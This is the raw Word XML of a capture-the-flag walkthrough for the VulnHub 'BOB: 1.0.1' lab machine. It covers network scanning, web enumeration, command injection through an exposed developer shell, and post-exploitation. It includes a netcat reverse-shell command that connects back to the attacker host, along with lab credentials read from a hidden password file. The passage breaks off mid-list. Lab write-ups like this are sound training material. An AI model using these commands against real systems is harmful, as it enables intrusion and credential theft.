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val="en-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1098705477"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="06C9B06D" w14:textId="75692F23" w:rsidR="008D6BB5" w:rsidRDefault="008D6BB5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02820225" wp14:editId="5098EFED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3-25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74D850C0" w14:textId="78B33592" w:rsidR="008D6BB5" w:rsidRDefault="004F0E67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3/25/2026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02820225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4472c4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3-25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74D850C0" w14:textId="78B33592" w:rsidR="008D6BB5" w:rsidRDefault="004F0E67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3/25/2026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6393091" wp14:editId="2B08F08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DD33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:color w:val="4472C4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8D6BB5">
                                      <w:rPr>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="26"/>
                                        <w:szCs w:val="26"/>
                                      </w:rPr>
                                      <w:t>YUVARAJ M</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5" w:rsidRDefault="00000000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8D6BB5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39309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DD33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:color w:val="4472C4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8D6BB5">
                                <w:rPr>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="26"/>
                                  <w:szCs w:val="26"/>
                                </w:rPr>
                                <w:t>YUVARAJ M</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5" w:rsidRDefault="00000000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8D6BB5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0FF9028" wp14:editId="374A1BB5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7A056F" w14:textId="1870AC14" w:rsidR="008D6BB5" w:rsidRDefault="00000000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8D6BB5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Challenge-</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00BB6B9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  <w:r w:rsidR="004F0E6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1</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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8D6B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Solving CTF </w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C57F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Machines</w:t>
                                    </w:r>
                                    <w:r w:rsidR="008D6B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C57F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from</w:t>
                                    </w:r>
                                    <w:r w:rsidR="008D6BB5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="00C57F5F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VulnHub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10FF902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87A056F" w14:textId="1870AC14" w:rsidR="008D6BB5" w:rsidRDefault="00000000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8D6BB5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Challenge-</w:t>
                              </w:r>
                              <w:r w:rsidR="00BB6B9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1</w:t>
                              </w:r>
                              <w:r w:rsidR="004F0E6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1</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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8D6B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Solving CTF </w:t>
                              </w:r>
                              <w:r w:rsidR="00C57F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Machines</w:t>
                              </w:r>
                              <w:r w:rsidR="008D6B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57F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from</w:t>
                              </w:r>
                              <w:r w:rsidR="008D6BB5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="00C57F5F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VulnHub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0C273BDB" w14:textId="5129961A" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/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1565334B" wp14:editId="04032530">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>2148840</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>2000885</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="3596640" cy="4998720"/>
                    <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="24009378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596640" cy="499872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3245113" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E67">
                                <w:pPr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</w:pPr>
                                <w:r w:rsidRPr="004F0E67">
                                  <w:rPr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>BOB: 1.0.1 Walkthrough</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="1E584595" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5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C57F5F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Platform:</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C57F5F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> VulnHub</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="68829560" w14:textId="72F051D7" w:rsidR="00130FA5" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5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C57F5F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Category:</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C57F5F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4F0E67" w:rsidRPr="004F0E67">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>Boot2Root / Web Exploitation / Privilege Escalation</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="27CCCE71" w14:textId="221B1AEF" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F">
                                <w:pPr>
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00C57F5F"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>Difficulty:</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C57F5F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> </w:t>
                                </w:r>
                                <w:r w:rsidR="00BB6B92">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>Medium</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                              <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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1565334B" id="_x0000_s1057" type="#_x0000_t202" style="position:absolute;margin-left:169.2pt;margin-top:157.55pt;width:283.2pt;height:393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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="13245113" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E67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  <w:r w:rsidRPr="004F0E67">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="40"/>
                              <w:szCs w:val="40"/>
                            </w:rPr>
                            <w:t>BOB: 1.0.1 Walkthrough</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1E584595" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F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Platform:</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C57F5F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> VulnHub</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="68829560" w14:textId="72F051D7" w:rsidR="00130FA5" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F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Category:</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C57F5F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4F0E67" w:rsidRPr="004F0E67">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Boot2Root / Web Exploitation / Privilege Escalation</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="27CCCE71" w14:textId="221B1AEF" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F"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>Difficulty:</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C57F5F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> </w:t>
                          </w:r>
                          <w:r w:rsidR="00BB6B92">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Medium</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                        <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                      </w:txbxContent>
                    </v:textbox>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="008D6BB5">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="03018FDD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BOB: 1.0.1 Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8BFF7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Platform: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VulnHub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Category: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Boot2Root / Web Exploitation / Privilege Escalation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Difficulty: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Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE946CA" w14:textId="0880A649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624D9F0E" w14:textId="33F59C92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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70845CAF" wp14:editId="34A9D721">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10548736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73634" name="Picture 105487363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BB6AC" w14:textId="4A77F7B1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45FBD57A" w14:textId="59F43E41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Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69397FDC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BOB 1.0.1 is a vulnerable Linux machine designed to test penetration testing skills such as enumeration, web exploitation, credential discovery, and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEB1341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objective is to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E99E1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• Perform network discovery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Identify open services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Exploit web vulnerabilities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Gain initial access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Escalate privileges to root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Capture the final flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48720A7B" w14:textId="77660B7A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2136FE15" w14:textId="20D340C8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020551E3" w14:textId="77777777" w:rsid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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55BE2074" w14:textId="01813A3B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Target Information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5"/>
        <w:gridCol w:w="1244"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="2DCF92DB" w14:textId="77777777" w:rsidTr="004F0E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EFDE26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022A5A1C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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="5FE54D29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9542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207CA35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VulnHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="0F3FF3EE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E0C09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Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB0B5EC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BOB 1.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="154D81E7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DB918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Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29329A13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172.20.10.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="1C623507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D3AD5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Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3446D4E5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172.20.10.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="4447770D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0D3B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509D7968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Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="00907C97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19A0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4C76B1D1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Web + SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42086248" w14:textId="6368FD10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113974F0" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="0062538B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Enumeration Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918BD3C" w14:textId="08466FBE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Step 1 — Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652076BE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sudo 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arp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-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29784FF6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command scans the local network to identify active devices. From the output, the target machine IP address was identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A04A4A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Target identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4EBC05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172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FDC12" w14:textId="6960C679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40AB0239" wp14:editId="3D6FF3E3">
            <wp:extent cx="5731510" cy="2622550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="132066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6610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A4041" w14:textId="4DC148CC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70A83809" w14:textId="77777777" w:rsid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</w:pPr>
    </w:p>
    <w:p w14:paraId="367FF3C7" w14:textId="401E9789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lastRenderedPageBreak/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Step 2 — Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B7DDED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nmap -sC -sV -p- -A 172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9B59F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command performs a detailed scan to identify open ports, running services, and versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A497D83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Open Ports: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"/>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="1656"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="690EFAED" w14:textId="77777777" w:rsidTr="004F0E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0E1E1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FC66607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79450CF5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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="0F3ECC5C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D53E6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40489DC9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14:paraId="3CD9EBFB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Apache 2.4.25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="5770ED12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32A688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25468</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D2BA9B0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3F19AF90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OpenSSH 7.4p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2243A980" w14:textId="7549849C" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E6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presence of HTTP indicates a web application, while SSH can be used later for remote login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA64CD" w14:textId="6890C3B6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14B11E72" wp14:editId="735AE96B">
            <wp:extent cx="5731510" cy="3733165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="32317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1741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9C306" w14:textId="0B1288DD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7C481419" w14:textId="77777777" w:rsid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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2583B1FB" w14:textId="77777777" w:rsid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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0B79A5" w14:textId="33995476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Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32469F2F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web application was accessed using a browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55ABCF" w14:textId="2B8D0AD3" w:rsid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hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="004F0E67">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:bCs/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://172.20.10.2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08DD1D8B" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="5E38600C" w14:textId="3D31D1A5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3B4470D2" wp14:editId="4A820279">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="61172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7270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06F5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To identify hidden files and vulnerabilities, a Nikto scan was performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF0A7EA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nikto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-h http://172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E669DB8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Nikto is a web vulnerability scanner that helps identify exposed files, misconfigurations, and potential entry points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BD49EE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Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C9D7C6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• robots.txt file discovered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Hidden endpoints identified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Sensitive files exposed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B679621" w14:textId="4B81A535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47ABAD2F" wp14:editId="1C475933">
            <wp:extent cx="5731510" cy="1361440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="180640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088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499A" w14:textId="61193616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2CCF7C14" w14:textId="3E54AFDF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robots.txt Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7CAA8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http://172.20.10.2/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27865C22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robots.txt file revealed several hidden paths that are not meant to be indexed but are still accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68895AAB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Discovered Paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868358C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/login.php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/dev_shell.php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/lat_memo.html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/passwords.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB3D7C" w14:textId="0AC0A321" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E67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These endpoints became the primary attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7E2119" w14:textId="0AA4DF37" w:rsid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7213EFE2" wp14:editId="3CAFF615">
            <wp:extent cx="5731510" cy="2701925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="55555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564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8128" w14:textId="77777777" w:rsidR="00A7267C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3E3CD776" w14:textId="39346701" w:rsidR="00A7267C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2A606BBA" wp14:editId="19257002">
            <wp:extent cx="5731510" cy="1531620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18443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376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FC17F" w14:textId="77777777" w:rsidR="00A7267C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0257A024" w14:textId="5D6122A0" w:rsidR="00A7267C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727A4929" wp14:editId="4A44260C">
            <wp:extent cx="5731510" cy="829945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="132586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8607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7338D" w14:textId="77777777" w:rsidR="00A7267C" w:rsidRDefault="00A7267C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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC8AF8D" w14:textId="33746583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Exploitation Phase (Command Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67036440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Access Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829D5A7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http://172.20.10.2/dev_shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F61872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page contained a developer shell that allows execution of system commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4714B0C5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Test command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE49DB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echo &amp;&amp; id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F46406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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE119E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uid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=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E6D9A0" w14:textId="75D6F0DA" w:rsidR="004F0E67" w:rsidRPr="00A7267C" w:rsidRDefault="004F0E67" w:rsidP="00A7267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A7267C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This confirms that commands are executed on the server as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7267C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7267C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 user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC8136" w14:textId="2849FBF7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39540381" wp14:editId="5A73EDCD">
            <wp:extent cx="5731510" cy="2737485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1216088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882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5BDF9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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5CCA1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To gain a stable shell, a reverse shell was initiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1807CB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27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Listener Setup (Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EFBF47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use exploit/multi/handler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set LHOST 172.20.10.3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set LPORT 4444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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689DA0A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prepares the attacker machine to receive a reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D971FB0" w14:textId="0EE95A7A" w:rsidR="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E67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 w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6176F823" w14:textId="2631F891" w:rsidR="00A7267C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6619A219" wp14:editId="1D26F2BA">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1946697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6972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79CED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27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Trigger Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BD87B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echo &amp;&amp; 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nc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172.20.10.3 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ECE337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command forces the target machine to connect back to the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D58AA0" w14:textId="0154B733" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="00A7267C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2A04C871" wp14:editId="59D2D807">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="182765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6507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E735" w14:textId="2940B2E5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53398FE1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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62518A58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A shell was obtained as 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www-data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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D35497A" w14:textId="6764E08F" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="00A7267C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2407BAE6" wp14:editId="14F242FA">
            <wp:extent cx="5731510" cy="3293110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="194511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119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0C2A9" w14:textId="321BB3FD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25489241" w14:textId="7C93C5B7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Shell Stabilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F9EAD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python -c 'import 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pty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; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417559A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upgrades the shell to a fully interactive terminal, allowing better command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31854B3C" w14:textId="716EEEB2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47C81095" wp14:editId="072BE111">
            <wp:extent cx="5731510" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="163831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1123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413A3" w14:textId="17E26C9F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Enumeration Phase (Post Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E92420F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Users Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD1E39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cd /home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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D7CC0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step identifies all users on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412797F5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Users found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD736A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lastRenderedPageBreak/>
        <w:t>• bob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 xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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elliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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jc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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seb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B5C786D" w14:textId="5E2A2EE1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1355555E" wp14:editId="6DD71697">
            <wp:extent cx="5731510" cy="7258050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="376826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826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9E1A6" w14:textId="77777777" w:rsidR="00A7267C" w:rsidRDefault="00A7267C" w:rsidP="004F0E6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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6584BB4C" w14:textId="34CBC391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Credential Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30123A50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Hidden Password File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653D186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cat /home/bob</w:t>
      </w:r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/.old_passwordfile.html</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1899DFF1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 hidden file containing credentials was discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230E75B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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092880DA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proofErr w:type="spellStart"/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jc:Qwerty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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</w:r>
      <w:proofErr w:type="spellStart"/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seb:Titanium</w:t>
      </w:r>
      <w:proofErr w:type="gram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_Pa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$$word_Hack3rs_Fear_M3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3E929" w14:textId="15E3C888" w:rsidR="004F0E67" w:rsidRPr="00A7267C" w:rsidRDefault="004F0E67" w:rsidP="00A7267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A7267C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These credentials indicate poor password management practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F946C3" w14:textId="4C7C49F9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572EA82D" wp14:editId="580D6B8C">
            <wp:extent cx="5731510" cy="2271395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8621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904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9116" w14:textId="259F53C0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Further Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F6E890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cd /home/bob/Documents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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4844A19F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Important files were found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF92B47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 xml:space="preserve">• </w:t>
      </w:r>
